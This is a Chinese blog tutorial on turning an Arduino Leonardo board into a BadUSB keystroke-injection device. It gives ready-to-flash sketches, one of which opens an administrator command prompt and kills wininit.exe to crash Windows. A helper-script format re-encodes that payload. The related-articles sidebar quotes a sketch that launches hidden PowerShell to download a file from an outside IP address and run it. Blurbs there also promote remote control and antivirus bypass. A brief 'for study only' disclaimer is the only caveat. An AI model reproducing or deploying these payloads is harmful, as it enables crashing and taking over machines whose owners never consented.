BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具

最新推荐文章于 2022-12-09 10:09:48 发布
最新推荐文章于 2022-12-09 10:09:48 发布
阅读量5.8k 收藏 69
点赞数 9
文章标签: arduino 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447477/article/details/115563085
版权

说明

本文章仅供学习交流,请勿用于非法用途

我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board

程序编写工具 https://download.csdn.net/download/weixin_45447477/16617234(使用教程在下面)

官网购买地址 https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975
在这里插入图片描述

软件-Arduino

Kali下自带
Windows下 官网下载地址 https://downloads.arduino.cc/arduino-1.8.13-windows.exe

开始制作

打开Arduino
在工具中择开发板 ‘Arduino Leonardo’
在这里插入图片描述
然后选择端口
在这里插入图片描述
然后就可以编写程序了

接下来是一些示例

1.蓝屏

#include <Keyboard.h>
void setup() {
	Keyboard.begin();   //开始
	delay(2000);   //等待两秒
	Keyboard.press(KEY_LEFT_CTRL);   //按下左边的Ctrl键
	Keyboard.press(KEY_LEFT_SHIFT);   //按下左边的Shift键
	Keyboard.press(KEY_ESC);   //按下ESC键
	Keyboard.releaseAll();   //松开所有按下的键(Ctrl,Shift,ESC)
	//以上代码执行结果: 打开任务管理器
	delay(500);   //等待0.5秒 作用: 等待任务管理器启动
	Keyboard.press(KEY_LEFT_ALT);   //按下左边的Alt键
	Keyboard.press('f');   //按下f键
	Keyboard.release('f');   //松开f键
	Keyboard.press('n');   //按下n键
	Keyboard.releaseAll();   //松开所有(n,Alt)
	delay(500);  //等待0.5秒 作用: 等待运行的启动
	Keyboard.press(KEY_TAB);   //按下Tab键
	Keyboard.release(KEY_TAB);   //松开Tab键
	Keyboard.press(' ');   //按下空格键
	Keyboard.release(' ');   //松开空格键
	//以上代码执行结果: 打开任务管理器中文件->运行新任务->勾选以管理员权限创建此任务
	//(提示: 如果觉得很迷惑,按上面代码自己操作一下就明白了)
	Keyboard.press(KEY_CAPS_LOCK);
	Keyboard.release(KEY_CAPS_LOCK);   //利用CapsLock绕过输入法
	Keyboard.println("cmd");   //在运行中输入cmd,由于按下了CapsLock所以实际上输入的是CMD
	delay(500);  //等待0.5秒 作用: 等待cmd的启动
	Keyboard.println("taskkill /f /fi \"pid ne 1\"");   //在cmd中输入蓝屏指令
	Keyboard.println("taskkill /f /im wininit.exe");   //指令2(其实一个就够了)
	Keyboard.press(KEY_CAPS_LOCK);
	Keyboard.release(KEY_CAPS_LOCK);
	Keyboard.end();   //结束
}

void loop() {
  // put your main code here, to run repeatedly:
}

2.dir/s和tree C:(一个很酷炫的东西) 加上LED闪烁

#include <Keyboard.h>
void setup() {
  pinMode(13, OUTPUT);   //这行加上void loop()下面都是LED闪烁
  Keyboard.begin();
  delay(2000);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  //以上三行: 打开运行
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("cmd");
  delay(500);
  Keyboard.press(KEY_F11);
  Keyboard.release(KEY_F11);
  //以上两行: 全屏(Win10有效)
  Keyboard.println("color 4");
  Keyboard.println("dir/s");
  Keyboard.println("tree d:");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop() {
  digitalWrite(13, HIGH);
  delay(300);   //点亮时间
  digitalWrite(13, LOW);
  delay(300);  //熄灭时间
}

写入到BadUSB

点击有向左箭头的按钮即可写入
在这里插入图片描述
看到上传成功字样就大功告成了!
注意: 上传后BadUSB会立即执行一遍代码
在这里插入图片描述

编写工具使用教程

工具下载地址在文章开头

拿前面的蓝屏的示例来说:
只需在一个名为file.txt的文本文档中输入:

\2000
=lc
=ls
=esc
--
\500
=la
=f
-f
=n
--
\500
=tab
= 
- 
=clk
-clk
cmd
\500
taskkill /f /fi \"pid ne 1\"
taskkill /f /im wininit.exe
=clk
-clk

总结:

=+要按下的键】
-+要松开的键】
-- 松开全部
\ 【+等待时间】
直接输的话是输入

按键列表(一般都是开头字母除非只有一个单词如enter)'lc':'LEFT_CTRL'
'ls':'LEFT_SHIFT'
'la':'LEFT_ALT'
'rcl':'RIGHT_CTRL'
'rs':'RIGHT_SHIFT'
'ra':'RIGHT_ALT'
'clk':'CAPS_LOCK'
'tab':'TAB'
'bs':'BACKSPACE'
'lwin':'LEFT_GUI'
'rwin':'RIGHT_GUI'
'esc':'ESC'
'enter':'RETURN'  //return就是enter
'del':'DELETE'

编写完成后,将工具与file.txt放在同一目录下,运行工具,生成的file.ino就是可运行的badusb程序,如果没有的话刷新一下就好了

创作不易,点个赞再走呗

JasonXu-bit
关注
  • 9
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2448
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
badusb详细制作教程(两种方式实现远控)
热门推荐
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4032
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
利用badusb远程控制
weixin_43211186的博客
01-07 4308
0x01 badusb简介 badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等 总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码 通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的用badusb拿shell的过程 ...
BadUsb制作
qq_34341458的博客
03-09 8155
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7165
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
【描述】中的"badusb制作工具包"表明,这个压缩包可能包含用于研究或教学目的的BadUSB工具教程。"需要自行打包带走"暗示用户需要自己处理和理解这些工具,可能涉及到编译、配置或定制化的过程,需要一定的技术背景...
BadUsb资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e
09-23
【标题】"BadUsb资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e" 涉及的是关于BadUSB漏洞利用和防护的相关资源集合。BadUSB是一种安全漏洞,它允许攻击者通过USB设备篡改硬件功能,将其转变为...
badusb_badusb_
09-29
【标题】:“badusb_badusb_”:深入理解BadUSB及其威胁 【描述】:“badusb资料,需要自行打包带走” 提示了本压缩包包含了关于BadUSB的相关研究和资料,BadUSB是一种针对USB设备的恶意攻击手段,它利用USB设备的...
Arduino BadUSB 程序编写工具
04-11
教程: [https://blog.csdn.net/weixin_45447477/article/details/115563085]
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
sketch_jan07a_Sketch!_badusb_
10-03
_badusb_" 指的可能是一个关于"BadUSB"安全问题的概念性草图或设计,可能是为了展示、讨论或教育人们理解这种威胁。"Sketch!"暗示这可能是一个概念性的草图或初步的设计,而不是一个完整的软件或硬件实现。"jan07a...
BadUSB制作教程
weixin_40485904的博客
02-04 1720
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
系统安全-BadUsb代码以及木马远控的制作(可绕过360)
Coisini的博客
05-31 9161
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作…. 硬件准备 这里我们使用的是: BS Micro pro micro leona...
第14节 实例-事件响应之组合键
一切皆可视
07-04 922
致谢 感谢网友提出这个问题。大家有问题也可以在评论区提出,有问必有答。 问题描述 经常的我们需要响应一些组合键,最常见的是左Shift+某键,以及鼠标左/右键按下去+键盘某键。OSG做这些操作非常简便。 本节代码在网盘中: 注意: 务必使用浏览器打开: 链接:https://pan.baidu.com/s/13gwJLwo_LbRnN3Bl2NXXXw 提取码:xrf5 功能描述 1. 当我们按下左shift+a的时候,会出打印:按下了左SHIFT+A 2. 当我们按下鼠标左键+a的时候,会出打印:按下了鼠
BadUsb程序大全-值得收藏
门柚的博客
07-31 1613
BadUsb程序大全-值得收藏
badusb示例代码可绕过360
OKAY_TC的博客
10-16 3189
绕过360版本代码: void setup() { // putpower shell your setup code here, to run once Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//...
BadUSB实现中,teensy版和ardunio Leonardo板子的区别
kittygilr的博客
01-25 3911
用单片机最小系统来实现BadUSB攻击,一种是用teensy开发板,一种是Leonard开发板。 这teensy2.0和leonard开发板,都使用相同的avr芯片atmega32u4,(teensy2.0和leonard使用的都是这款芯片,teeny2.0后续版本有所不同,参见 https://www.pjrc.com/teensy/ https://www.pjrc.com/teensy/te...
BadUSB的前世今生:USB RUBBER DUCKY和Teensy USB
CtoneGao的博客
10-25 3139
一、介绍 前段时间翻译了有关BadUSB的两篇文章《解密BadUSB:世界上最邪恶的USB外设》和《研究人员公布BadUSB攻击测试(exploit)代码》,大家反应强烈,很多人都在打听BadUSB的实现方法,或者从那里可以买到这样的U盘。原本打算本周写一篇分析已公开的BadUSB利用代码,兑现一下诺言,但实在是抽不出时间。在此先给大家介绍一下BadUSB的“老前辈”:USB RUBBE
SEToolkit + badusb
最新发布
07-25
SEToolkit + badusb是一种攻击方法,它利用了BadUSB的原理来实现PowerShell注入攻击。SEToolkit是一个开源的渗透测试工具包,而badusb则是指利用USB固件漏洞的攻击方式。通过使用SEToolkit和badusb,攻击者可以重新编程USB设备,使其充当人机交互设备,并在受害者的计算机上执行恶意命令或运行恶意程序。这种攻击方法在黑客社区中被广泛使用,因为它具有隐蔽性和灵活性,可以绕过传统的安全防护措施。然而,这种攻击方法也需要攻击者具备一定的技术知识和实施能力。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [badusb详细制作教程(两种方式实现远控)](https://blog.csdn.net/Ghost_system/article/details/126383082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JasonXu-bit

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值